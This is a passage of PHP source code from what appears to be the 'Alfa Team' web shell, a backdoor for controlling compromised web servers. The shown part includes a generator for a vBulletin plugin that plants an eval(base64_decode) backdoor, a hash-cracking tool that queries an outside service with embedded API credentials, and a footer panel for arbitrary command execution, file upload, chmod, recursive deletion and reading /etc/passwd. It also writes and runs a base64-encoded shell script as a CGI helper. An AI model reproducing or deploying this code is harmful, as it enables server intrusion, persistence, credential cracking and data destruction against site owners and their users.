echo “<div class=header><center><p><div class=’txtfont_header’>| Shell For vBulletin |</div></p><form onsubmit=\”g(‘php2xml’,null,this.code.value,’>>’); return false;\” method=’post’>
<p><br><textarea rows=’12′ cols=’70′ type=’text’ name=’code’ placeholder=\”insert your shell code\”></textarea><br/><br/>
<input type=’submit’ name=’go’ value=’ ‘ /></p></form></center>”;
if($_POST['alfa2']&&$_POST['alfa2']==’>>’){
echo __pre().”<p><center><textarea rows=’10′ name=’users’ cols=’80′>”;
echo ‘<?xml version=”1.0″ encoding=”ISO-8859-1″?><plugins><plugin active=”1″ product=”vbulletin”><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],”subscriptions.php”)){eval(base64_decode(\”.__ZW5jb2Rlcg($_POST['alfa1']).’\’));exit;}]]></phpcode></plugin></plugins>’;
echo ‘</textarea></center></p>’;
}
echo ‘</center></div>’;
alfafooter();
}
function alfacpcrack(){
alfahead();
echo ‘<div class=header><center><p><div class=”txtfont_header”>| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick=”g(\’cpcrack\’,null,\’dec\’)”>| DeCrypter | </a><a href=javascript:void(0) onclick=”g(\’cpcrack\’,null,\’analyzer\’)”>| Hash Analyzer | </a></h3></center>’;
if($_POST['alfa1']==’dec’){
$algorithms = array(‘md5′=>’MD5′,’md4′=>’MD4′,’sha1′=>’SHA1′,’sha256′=>’SHA256′,’sha384′=>’SHA384′,’sha512′=>’SHA512′,’ntlm’=>’NTLM’);
echo ‘<center><div class=”txtfont_header”>| DeCrypter |</div><br><br>
<form onsubmit=”g(\’cpcrack\’,null,\’dec\’,this.md5.value,\’>>\’,this.alg.value); return false;”><div class=”txtfont”>Decrypt Method:</div> <select name=”alg” style=”width:100px;”>’;
foreach($algorithms as $key=>$val){echo(‘<option value=”‘.$key.’”>’.$val.’</option>’);}
echo’</select><input type=”text” placeholder=”Hash” name=”md5″ size=”60″ id=”text” /> <input type=”submit” value=” ” name=”go” /></form></center><br>’;
if($_POST['alfa3'] == ‘>>’){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$hash_type = $_POST['alfa4'];
$email = “solevisible@gmail.com”;
$code = “7b9fa79f92c3cd96″;
$target = “http://md5decrypt.net/Api/api.php?hash=”.$hash.”&hash_type=”.$hash_type.”&email=”.$email.”&code=”.$code;
$resp = @file_get_contents($target);
if($resp==”){
$get = new AlfaCURL();
$resp = $get->Send($target);
}
echo __pre().’<center>’;
switch($resp){
case(‘CODE ERREUR : 001′):echo “<b><font color=’red’>You exceeded the 400 allowed request per day</font></b>”;break;
case(‘CODE ERREUR : 003′):echo “<b><font color=’red’>Your request includes more than 400 hashes.</font></b>”;break;
case(‘CODE ERREUR : 004′):echo “<b><font color=’red’>The type of hash you provide in the argument hash_type doesn’t seem to be valid</font></b>”;break;
case(‘CODE ERREUR : 005′):echo “<b><font color=’red’>The hash you provide doesn’t seem to match with the type of hash you set.</font></b>”;break;
}
if(substr($resp,0,4)!=’CODE’&&$resp!=”){
echo “<b>Result: <font color=’green’>”.$resp.”</font></b>”;
}elseif(substr($resp,0,4)!=’CODE’){
echo “<font color=’red’>NoT Found</font><br />”;
}
echo(‘</center>’);
}
}
}
if($_POST['alfa1']==’analyzer’){
echo ‘<center><p><div class=”txtfont_header”>| Hash Analyzer |</div></p>
<form onsubmit=”g(\’cpcrack\’,null,\’analyzer\’,this.hash.value,\’>>\’);return false;”>
<div class=”txtfont”>Hash: </div> <input type=”text” placeholder=”Hash” name=”hash” size=”60″ id=”text” /> <input type=”submit” value=” ” name=”go” /></form></center><br>’;
if($_POST['alfa3'] == ‘>>’){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$curl = new AlfaCURL();
$resp = $curl->Send(“http://md5decrypt.net/en/HashFinder/”,”post”,”hash={$hash}&crypt=Search”);
echo(__pre().’<center>’);
if(preg_match(‘#<fieldset class=”trouve”>(.*?)</fieldset>#’,$resp,$s)){
echo(‘<font color=”green”>’.$s[1].’</font>’);
}else{
echo(‘<font color=”red”>Not Found…!</font>’);
}
echo(‘</center><br>’);
}
}
}
echo ‘</div>’;
alfafooter();
}
function alfafooter(){
if(!isset($_POST['ajax'])){
echo “<table class=’foot’ width=’100%’ border=’0′ cellspacing=’3′ cellpadding=’0′ >
<tr>
<td width=’17%’><form onsubmit=\”if(this.f.value.trim().length==0)return false;editor(this.f.value,’mkfile’,”,”,”,’file’);this.f.value=”;return false;\”><span class=’footer_text’>Make File : </span><br><input class=’dir’ type=’text’ name=’f’ value=”> <input type=’submit’ value=’ ‘></form></td>
<td width=’21%’><form onsubmit=\”g(‘FilesMan’,null,’mkdir’,this.d.value);this.d.value=”;return false;\”><span class=’footer_text’>Make Dir : </span><br><input class=’dir’ type=’text’ name=’d’ value=’ ‘> <input type=’submit’ value=’ ‘></form></td>
<td width=’22%’><form onsubmit=\”g(‘FilesMan’,null,’delete’,this.del.value);this.del.value=”;return false;\”><span class=’footer_text’>Delete : </span><br><input class=’dir’ type=’text’ name=’del’ value=’ ‘> <input type=’submit’ value=’ ‘></form></td>
<td width=’19%’><form onsubmit=\”if(this.f.value.trim().length==0)return false;editor(this.f.value,’chmod’,”,”,”,’none’);this.f.value=”;return false;\”><span class=’footer_text’>Chmod : </span><br><input class=’dir’ type=text name=f value=’ ‘> <input type=’submit’ value=’ ‘></form></td>
</tr>
<tr>
<td colspan=’2′><form onsubmit=’g(\”FilesMan\”,this.c.value,\”\”);return false;’><span class=’footer_text’>Change Dir : </span><br><input class=’foottable’ id=’footer_cwd’ type=’text’ name=’c’ value=’”.htmlspecialchars($GLOBALS['cwd']).”‘> <input type=’submit’ value=’ ‘></form></td>
<td colspan=’2′><form onsubmit=\”editor(this.file.value,’auto’,”,”,”,’file’);return false;\”><span><span class=’footer_text’>Read File : </span></span><br><input class=’foottable’ type=’text’ name=’file’ value=’/etc/passwd’> <input type=’submit’ value=’ ‘></form></td>
</tr>
<tr>
<td colspan=’4′><form onsubmit=\”g(‘proc’,null,this.c.value);this.c.value=”;return false;\”><span><span class=’footer_text’>Execute :</span><br><input class=’foottable’ type=’text’ name=’c’ value=’ ‘> <input type=’submit’ value=’ ‘></form></td>
</tr>
<tr>
<td colspan=’4′><form onsubmit=’u(this);return false;’ name=’footer_form’ method=’post’ ENCTYPE=’multipart/form-data’>
<input type=’hidden’ name=’a’ value=’FilesMAn’>
<input type=’hidden’ name=’c’ value=’” . $GLOBALS['cwd'] .”‘>
<input type=’hidden’ name=’alfa1′ value=’uploadFile’>
<input type=’hidden’ name=’charset’ value=’” . (isset($_POST['charset'])?$_POST['charset']:”) . “‘>
<span class=’footer_text’>Upload file: </span><span><button id=’addup’ onclick=’addnewup();return false;’><b>+</b></button></span><p id=’pfooterup’><label class=’inputfile’ for=’footerup’><span id=’__fnameup’></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id=’footerup’ class=’toolsInp’ type=’file’ name=’f[]’ onChange=’handleup(this,0);’></p><input type=’submit’ name=’submit’ value=’ ‘></form><br><span class=’copyright’>[ ./AlfaTeam &copy; 2012-".date('Y')." ]</span></td>
</tr>
</table>
</div>
<div id=’cgiloader’><div class=’editor-wrapper’><div class=’editor-header’><div class=’editor-controller’><div class=’editor-minimize’ onClick=’editorMinimize(\”cgiloader\”);’></div><div onClick=’editorClose(\”cgiloader\”);’ class=’close-button’></div></div></div><div id=’cgiframe’ style=’margin-left:14px;margin-right:30px;’></div></div></div>
<div id=’editor’><div class=’editor-wrapper’><div class=’editor-header’><div class=’editor-path’></div><div class=’editor-controller’><div class=’editor-minimize’ onClick=’editorMinimize(\”editor\”);’></div><div onClick=’editorClose(\”editor\”);’ class=’close-button’></div></div></div><div class=’editor-explorer’><div class=’hheader’><div class=’history-clear’ onclick=’clearEditorHistory();’>Clear all</div><div class=’hheader-text’>History</div><div class=’editor-search’><input type=’text’ style=’text-align:center;’ id=’search-input’ placeholder=’search’></div></div><div class=’history-list’></div></div><div class=’editor-modal’><div class=’editor-body’><div class=’editor-content’></div></div></div></div></div>
<div id=’update-content’></div>
<div id=’editor-minimized’ onclick=’showEditor(\”editor\”);’><div class=’minimized-wrapper’><div class=’minimized-text’>Show Editor</div></div></div>
<div id=’cgiloader-minimized’ onclick=’showEditor(\”cgiloader\”);’><div class=’minimized-wrapper’><div class=’minimized-text’>Show Cgi</div></div></div>
<script>
$(‘search-input’).addEventListener(‘keydown’, function(e){
setTimeout(function(){
var string = $(‘search-input’).value
d.getElementsByClassName(‘history-list’)[0].innerHTML = ”;
for(var i in editor_files){
if(editor_files[i].file.search(string) != -1 || string == ”){
var mode = 0;
if(i == editor_current_file){
mode = ‘ is_active’;
}
insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
}
}
}, 100);
},false);
_Ajax(d.URL, ‘a=’+alfab64(‘checkupdate’), function(res){
d.body.insertAdjacentHTML(‘beforeend’, res);
});
if(“.$GLOBALS["need_to_update_header"].”){
_Ajax(d.URL, ‘a=’+alfab64(‘updateheader’), function(res){
try{
var data = JSON.parse(res);
console.log(data);
for(var i in data){
var html = ”;
for(var b = 0; b < data[i].length; b++){
if(i==’useful’||i==’downloader’){
html += ‘<span class=\”header_values\” style=\”margin-left: 4px;\”>’+data[i][b]+’</span>’;
}else{
html += data[i][b];
}
}
var elem = $(‘header_’+i);
if(elem){elem.innerHTML = html;}
}
$(‘header_cgishell’).innerHTML = ‘ON’;
$(‘header_cgishell’).setAttribute(‘class’, ‘header_on’);
}catch(e){console.log(e)}
});
}else if(islinux){
_Ajax(d.URL, ‘a=’+alfab64(‘checkcgi’), function(res){
if(res==’ok’){
$(‘header_cgishell’).innerHTML = ‘ON’;
$(‘header_cgishell’).setAttribute(‘class’, ‘header_on’);
}
});
}
</script>
</body>
</html>
“;
}}
if (!function_exists(“posix_getpwuid”) && (strpos(@ini_get(‘disable_functions’), ‘posix_getpwuid’)===false)) {
function posix_getpwuid($p) {return false;} }
if (!function_exists(“posix_getgrgid”) && (strpos(@ini_get(‘disable_functions’), ‘posix_getgrgid’)===false)) {
function posix_getgrgid($p) {return false;} }
function alfaWhich($p) {
$path = alfaEx(‘which ‘ . $p,false,false);
if(!empty($path))
return strlen($path);
return false;
}
function alfaSize($s) {
if($s >= 1073741824)
return sprintf(‘%1.2f’, $s / 1073741824 ). ‘ GB’;
elseif($s >= 1048576)
return sprintf(‘%1.2f’, $s / 1048576 ) . ‘ MB’;
elseif($s >= 1024)
return sprintf(‘%1.2f’, $s / 1024 ) . ‘ KB’;
else
return $s . ‘ B’;
}
function alfaPerms($p) {
if (($p & 0xC000) == 0xC000)$i = ‘s’;
elseif (($p & 0xA000) == 0xA000)$i = ‘l’;
elseif (($p & 0×8000) == 0×8000)$i = ‘-’;
elseif (($p & 0×6000) == 0×6000)$i = ‘b’;
elseif (($p & 0×4000) == 0×4000)$i = ‘d’;
elseif (($p & 0×2000) == 0×2000)$i = ‘c’;
elseif (($p & 0×1000) == 0×1000)$i = ‘p’;
else $i = ‘u’;
$i .= (($p & 0×0100) ? ‘r’ : ‘-’);
$i .= (($p & 0×0080) ? ‘w’ : ‘-’);
$i .= (($p & 0×0040) ? (($p & 0×0800) ? ‘s’ : ‘x’ ) : (($p & 0×0800) ? ‘S’ : ‘-’));
$i .= (($p & 0×0020) ? ‘r’ : ‘-’);
$i .= (($p & 0×0010) ? ‘w’ : ‘-’);
$i .= (($p & 0×0008) ? (($p & 0×0400) ? ‘s’ : ‘x’ ) : (($p & 0×0400) ? ‘S’ : ‘-’));
$i .= (($p & 0×0004) ? ‘r’ : ‘-’);
$i .= (($p & 0×0002) ? ‘w’ : ‘-’);
$i .= (($p & 0×0001) ? (($p & 0×0200) ? ‘t’ : ‘x’ ) : (($p & 0×0200) ? ‘T’ : ‘-’));
return $i;
}
function alfaPermsColor($f,$isbash=false){
$class = “”;
$num = “”;
$human = “”;
if($isbash){
$class = $f["class"];
$num = $f["num"];
$human = $f["human"];
}else{
$num = substr(sprintf(‘%o’, @fileperms($f)),-4);
$human = alfaPerms(@fileperms($f));
if(!@is_readable($f))
$class = “main_red_perm”;
elseif (!@is_writable($f))
$class = “main_white_perm”;
else
$class = “main_green_perm”;
}
return ‘<span style=”font-weight:unset;” class=”‘.$class.’”>’.$num.’</span><span style=”font-weight:unset;” class=”beetween_perms”> >> </span><span style=”font-weight:unset;” class=”‘.$class.’”>’.$human.’</span>’;
}
if(!function_exists(“scandir”)) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}
function reArrayFiles($file_post){
$file_ary = array();
$file_count = count($file_post['name']);
$file_keys = array_keys($file_post);
for ($i=0; $i<$file_count; $i++) {
foreach ($file_keys as $key) {
$file_ary[$i][$key] = $file_post[$key][$i];
}
}
return $file_ary;
}
function _alfa_can_runCommand($cgi=true,$cache=true){
if(isset($_SESSION["alfa_canruncmd"])&&$cache){
return true;
}
if(strlen(alfaEx(“whoami”,false,$cgi))>0){
$_SESSION["alfa_canruncmd"] = true;
return true;
}
return false;
}
function _alfa_symlink($target, $link){
$phpsym = function_exists(“symlink”);
if($phpsym){
@symlink($target, $link);
}else{
alfaEx(“ln -s ‘”.addslashes($target).”‘ ‘”.addslashes($link).”‘”);
}
}
function _alfa_file_exists($file,$cgi=true){
if(@file_exists($file)){
return true;
}else{
if(strlen(alfaEx(“ls -la ‘”.addslashes($file).”‘”,false,$cgi))>0){
return true;
}
}
return false;
}
function _alfa_file($file,$cgi=true){
$array = @file($file);
if(!$array){
if(strlen(alfaEx(“id”,false,$cgi))>0){
$data = alfaEx(‘cat “‘.addslashes($file).’”‘,false,$cgi);
if(strlen($data)>0){
return explode(“\n”, $data);
}else{
return false;
}
}else{
return false;
}
}else{
return $array;
}
}
function _alfa_is_writable($file){
$check = false;
$check = @is_writable($file);
if(!$check){
if(_alfa_can_runCommand()){
$check = alfaEx(‘[ -w "'.trim(addslashes($file)).'" ] && echo “yes” || echo “no”‘);
if($check == “yes”){
$check = true;
}else{
$check = false;
}
}
}
return $check;
}
function _alfa_is_dir($dir,$mode=”-d”){
$check = false;
$check = @is_dir($dir);
if(!$check){
if(_alfa_can_runCommand()){
$check = alfaEx(‘[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo “yes” || echo “no”‘);
if($check == “yes”){
return true;
}else{
return false;
}
}
}
return $check;
}
function alfaFilesMan(){
alfahead();
AlfaNum(8,9,10,7,6,5,4);
echo ‘<div class=”ajaxarea”><div class=”header”>’;
if(!empty ($_COOKIE['f']))
$_COOKIE['f'] = @unserialize($_COOKIE['f']);
if(!empty($_POST['alfa1'])){
switch($_POST['alfa1']){
case ‘uploadFile’:
if(isset($GLOBALS['glob_chdir_false'])){
$alfa_canruncmd = _alfa_can_runCommand(true,true);
$move_cmd_file = true;
}
$files = reArrayFiles($_FILES['f']);
foreach($files as $file){
if($move_cmd_file){
alfaEx(“cat ‘”.addslashes($file['tmp_name']).”‘ > ‘”.addslashes($_POST["c"].”/”.$file['name']).”‘”);
}else{
@move_uploaded_file($file['tmp_name'],$file['name']);
}
echo “uped…!<Br>”;
}
break;
case ‘mkdir’:
$new_dir_cmd = false;
if(isset($GLOBALS['glob_chdir_false'])){
if(_alfa_can_runCommand(true,true)){
alfaEx(“cd ‘”.trim(addslashes($_POST['c'])).”‘;mkdir ‘”.trim(addslashes($_POST['alfa2'])).”‘”);
}
}else{
if(!@mkdir(trim($_POST['alfa2'])))
echo “<b><font color=’red’>Can’t create new dir !</b></font>”;
}
break;
case ‘delete’:
function deleteDir($path){
$path = (substr($path,-1)==’/’) ? $path:$path.’/’;
$dh = @opendir($path);
while(($item = @readdir($dh)) !== false){
$item = $path.$item;
if((basename($item) == “..”) || (basename($item) == “.”))
continue;
$type = @filetype($item);
if ($type == “dir”)
deleteDir($item);
else
@unlink($item);
}
@closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f){
if($f == ‘..’)
continue;
$f = rawurldecode($f);
if(isset($GLOBALS["glob_chdir_false"])){
if(_alfa_can_runCommand(true,true)){
alfaEx(“rm -rf ‘”.addslashes($_POST['c'].’/’.$f).”‘”);
}
}else{
alfaEx(“rm -rf ‘”.addslashes($f).”‘”,false,false);
if(@is_dir($f))
deleteDir($f);
else
@unlink($f);
}
}
if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!=’..’){
deleteDir(rawurldecode(@$_POST['alfa2']));
alfaEx(“rm -rf ‘”.addslashes($_POST['alfa2']).”‘”,false,false);
}else{
@unlink(rawurldecode(@$_POST['alfa2']));
}
if(isset($GLOBALS["glob_chdir_false"])){
$source = rawurldecode(@$_POST['alfa2']);
if($source!=’..’&&!empty($source)){
if(_alfa_can_runCommand(true,true)){
alfaEx(“cd ‘”.trim(addslashes($_POST['c'])).”‘;rm -rf ‘”.addslashes($source).”‘”);
}
}
}
break;
case ‘paste’:
if($_SESSION['act'] == ‘copy’&&isset($_SESSION['f'])){
function copy_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != “.”) and ($f != “..”))
copy_paste($c.$s.’/’,$f, $d.$s.’/’);
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
}elseif($_SESSION['act'] == ‘move’&&isset($_SESSION['f'])){
function move_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if(($f != “.”) and ($f != “..”))
copy_paste($c.$s.’/’,$f, $d.$s.’/’);
}elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
}elseif($_SESSION['act'] == ‘zip’&&isset($_SESSION['f'])){
if(class_exists(‘ZipArchive’)){
$zip = new ZipArchive();
$zipX = “alfa_”.rand(1,1000).”.zip”;
if($zip->open($zipX, 1)){
@chdir($_SESSION['c']);
foreach($_SESSION['f'] as $f){
if($f == ‘..’)continue;
if(@is_file($_SESSION['c'].$f))
$zip->addFile($_SESSION['c'].$f, $f);
elseif(@is_dir($_SESSION['c'].$f)){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.’/’));
foreach($iterator as $key=>$value){
$key = str_replace(‘\\’,’/’,realpath($key));
if(@is_dir($key)){
if(in_array(substr($key, strrpos($key,’/’)+1),array(‘.’, ‘..’)))continue;
}else{$zip->addFile($key,$key);}}}}
@chdir($GLOBALS['cwd']);
$zip->close();
__alert(‘>> ‘.$zipX.’ << is created…’);}}
}elseif($_SESSION['act'] == ‘unzip’&&isset($_SESSION['f'])){
if(class_exists(‘ZipArchive’)){
$zip = new ZipArchive();
foreach($_SESSION['f'] as $f) {
if($zip->open($_SESSION['c'].$f)){
$zip->extractTo($GLOBALS['cwd']);
$zip->close();}}}}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['alfa1'])){
$_SESSION['act'] = @$_POST['alfa1'];
$_SESSION['f'] = @$_POST['f'];
$_SESSION['c'] = @$_POST['c'];
}
break;
}
}
if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ”){
$dirContent = @scandir($_SESSION[__LAST_CWD__]);
}else{
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if(preg_match(“#(.*)\/\.\.#”, $_POST['c'], $res)){
$path = explode(‘/’, $res[1]);
array_pop($path);
$_POST['c'] = implode(‘/’, $path);
}
$_SESSION[__LAST_CWD__] = str_replace(array(“..”,”//”), array(“”,”/”), $_POST['c']);
}
$cmd_dir = false;
if($dirContent === false){
if(_alfa_can_runCommand(true,true)){
@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
if(!isset($_SESSION["alfachdir_bash"])||@!file_exists(“alfacgiapi/getdir.alfa”)){
$bash = “jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=”;
alfaWriteTocgiapi(“getdir.alfa”,$bash);
}
if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = “/”;
$dirContent = alfaEx(“cd alfacgiapi;sh getdir.alfa ‘”.addslashes($_SESSION[__LAST_CWD__]).”‘”);
$dirContent = json_decode($dirContent, true);
if(is_array($dirContent)){
array_pop($dirContent);
$cmd_dir = true;
}else{
$dirContent = false;
}
$_SESSION["alfachdir_bash"] = true;
}
}
if($dirContent == false){
echo ‘<center><br><span style=”font-size:16px;”><span style=”color: red; -webkit-text-shadow: 1px 1px 13px;”><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>’;
alfaFooter();
return;
}
global $sort;
$sort = array(‘name’, 1);
if(!empty($_POST['alfa1'])) {
if(preg_match(‘!s_([A-z]+)_(\d{1})!’, $_POST['alfa1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo “<form onsubmit=’fc(this);return false;’ name=’files’ method=’post’><table width=’100%’ class=’main’ cellspacing=’0′ cellpadding=’2′><tr><th width=’13px’><div class=’myCheckbox’ style=’padding-left:0px;’><input type=’checkbox’ id=’mchk’ onclick=’checkBox();’ class=’chkbx’><label for=’mchk’></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>”;
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++){
if($cmd_dir){
$filename = $dirContent[$i]["name"];
$file_owner = $dirContent[$i]["owner"];
$file_group = $dirContent[$i]["group"];
$file_modify = @date(‘Y-m-d H:i:s’, $dirContent[$i]["modify"]);
$file_perm = alfaPermsColor(array(“class”=>$dirContent[$i]["permcolor"],”num”=>$dirContent[$i]["permnum"],”human”=>$dirContent[$i]["permhuman"]),true);
$file_size = $dirContent[$i]["size"];
$file_path = $_SESSION[__LAST_CWD__].”/”.$dirContent[$i]["name"];
}else{
$filename = $dirContent[$i];
$ow = function_exists(“posix_getpwuid”)&&function_exists(“fileowner”)?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array(“name” => “????”);
$gr = function_exists(“posix_getgrgid”)&&function_exists(“filegroup”)?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array(“name” => “????”);
$file_owner = $ow['name']?$ow['name']:(function_exists(“fileowner”)?@fileowner($GLOBALS['cwd'].$filename):”????”);
$file_group = $gr['name']?$gr['name']:(function_exists(“filegroup”)?@filegroup($GLOBALS['cwd'].$filename):”????”);
$file_modify = @date(‘Y-m-d H:i:s’, @filemtime($GLOBALS['cwd'] . $filename));
$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
$file_size = @filesize($GLOBALS['cwd'].$filename);
$file_path = $GLOBALS['cwd'].$filename;
}
$tmp = array(‘name’ => $filename,
‘path’ => $file_path,
‘modify’ => $file_modify,
‘perms’ => $file_perm,
‘size’ => $file_size,
‘owner’ => $file_owner,
‘group’ => $file_group
);
if(!$cmd_dir){
if(@is_file($file_path))
$files[] = array_merge($tmp, array(‘type’ => ‘file’));
elseif(@is_link($file_path))
$dirs[] = array_merge($tmp, array(‘type’ => ‘link’, ‘link’ => readlink($tmp['path'])));
elseif(@is_dir($file_path)&& ($filename != “.”))
$dirs[] = array_merge($tmp, array(‘type’ => ‘dir’));
}else{
if($dirContent[$i]["type"]==”file”){
$files[] = array_merge($tmp, array(‘type’ => ‘file’));
}else{
if($dirContent[$i]["name"] != “.”){
$dirs[] = array_merge($tmp, array(‘type’ => ‘dir’));
}
}
}
}
$GLOBALS['sort'] = $sort;
function alfaCmp($a, $b) {
if($GLOBALS['sort'][0] != ‘size’)
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, “alfaCmp”);
usort($dirs, “alfaCmp”);
$files = array_merge($dirs, $files);
$l=0;
$cc=0;
foreach($files as $f){
$f['name'] = htmlspecialchars($f['name']);
$newname = mb_strlen($f['name'], ‘UTF-8′)>60?mb_substr($f['name'], 0, 60, ‘utf-8′).’…’:$f['name'];
$checkbox = ‘checkbox’.$cc;
$raw_name = rawurlencode($f['name']);
$icon = $GLOBALS['DB_NAME']['show_icons']?’<img src=”‘.findicon($f['name'],$f['type']).’” width=”30″ height=”30″>’:”;
$style = $GLOBALS['DB_NAME']['show_icons']?’position:relative;display:inline-block;bottom:12px;’:”;
echo ‘<tr’.($l?’ class=l1′:”).’><td><div class=”myCheckbox”><input type=”checkbox” name=”f[]” value=”‘.$raw_name.’” class=”chkbx” id=”‘.$checkbox .’”><label for=”‘.$checkbox .’”></label></div></td><td>’.$icon.’<div style=”‘.$style.’”><a class=”main_name” href=javascript:void(0) onclick=”‘.(($f['type']==’file’)?’editor(\”.$raw_name.’\’,\’auto\’,\’\’,\’\’,\’\’,\”.$f['type'].’\’);”>’.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?”<span class=’shell_name’ style=’font-weight:unset;’>”.$f['name'].”</span>”:htmlspecialchars($newname)):’g(\’FilesMan\’,\”.$f['path'].’\’);” title=’ . $f['link'] . ‘><b>| ‘ . htmlspecialchars($f['name']) . ‘ |</b>’).’</a></td></div><td><span style=”font-weight:unset;” class=”main_size”>’.(($f['type']==’file’)?alfaSize($f['size']):$f['type']).’</span></td><td><span style=”font-weight:unset;” class=”main_modify”>’.$f['modify'].’</span></td><td><span style=”font-weight:unset;” class=”main_owner_group”>’.$f['owner'].’/’.$f['group'].’</span></td><td><a href=javascript:void(0) onclick=”editor(\”.$raw_name.’\’,\’chmod\’,\’\’,\’\’,\’\’,\”.$f['type'].’\’)”>’.
$f['perms'].’</td><td><a class=”actions” href=”javascript:void(0);” onclick=”editor(\”.$raw_name.’\’, \’rename\’,\’\’,\’\’,\’\’,\”.$f['type'].’\’)”>R</a> <a class=”actions” href=”javascript:void(0);” onclick=”editor(\”.$raw_name.’\’, \’touch\’,\’\’,\’\’,\’\’,\”.$f['type'].’\’)”>T</a>’.(($f['type']==’file’)?’ <a class=”actions” href=”javascript:void(0);” onclick=”editor(\”.$raw_name.’\’, \’edit\’,\’\’,\’\’,\’\’,\”.$f['type'].’\’)”>E</a> <a class=”actions” href=”javascript:void(0);” onclick=”g(\’FilesTools\’,null,\”.$raw_name.’\’, \’download\’)”>D</a>’:”).’<a class=”actions” href=”javascript:void(0);” onclick=”var chk = confirm(\’Are You Sure For Delete # ‘.addslashes(rawurldecode($f['name'])).’ # ?\’); chk ? g(\’FilesMan\’,null,\’delete\’, \”.$raw_name.’\’) : \’\’;”> X </a></td></tr>’;
$l = $l?0:1;
$cc++;
}
echo “<tr><td colspan=7>
<input type=hidden name=a value=’FilesMan’>
<input type=hidden name=c value=’”.htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd'])).”‘>
<input type=hidden name=charset value=’”. (isset($_POST['charset'])?$_POST['charset']:”).”‘>
<select id=’tools_selector’ name=’alfa1′><option value=’copy’>Copy</option><option value=’move’>Move</option><option value=’delete’ selected>Delete</option><option value=’zip’>Add 2 Compress (zip)</option><option value=’unzip’>Add 2 Uncompress (zip)</option><option value=’paste’>Paste / Zip / Unzip </option></select>
<input type=’submit’ value=’ ‘>
</form></table></div></div>”;
alfafooter();
}
function alfaFilesTools(){
alfahead();
echo ‘<div class=”filestools”>’;
if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
$alfa1_decoded = $_POST['alfa1'];
$chdir_fals = false;
if(!@chdir($_POST['c'])){
$chdir_fals = true;
$_POST['alfa1'] = $_POST["c"].”/”.$_POST["alfa1"];
$alfa_canruncmd = _alfa_can_runCommand(true,true);
if($alfa_canruncmd){
$slashed_alfa1 = addslashes($_POST['alfa1']);
$file_info = explode(“:”, alfaEx(‘stat -c “%F:%U:%G:%s:%Y:0%a:%A” “‘.$slashed_alfa1.’”‘));
$perm_color_class = alfaEx(“if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi”);
}
}
if($_POST['alfa2'] == ‘auto’){
if(is_array(@getimagesize($_POST['alfa1']))){
$_POST['alfa2'] = ‘image’;
}else{
$_POST['alfa2'] = ‘view’;
if($chdir_fals){
if($alfa_canruncmd){
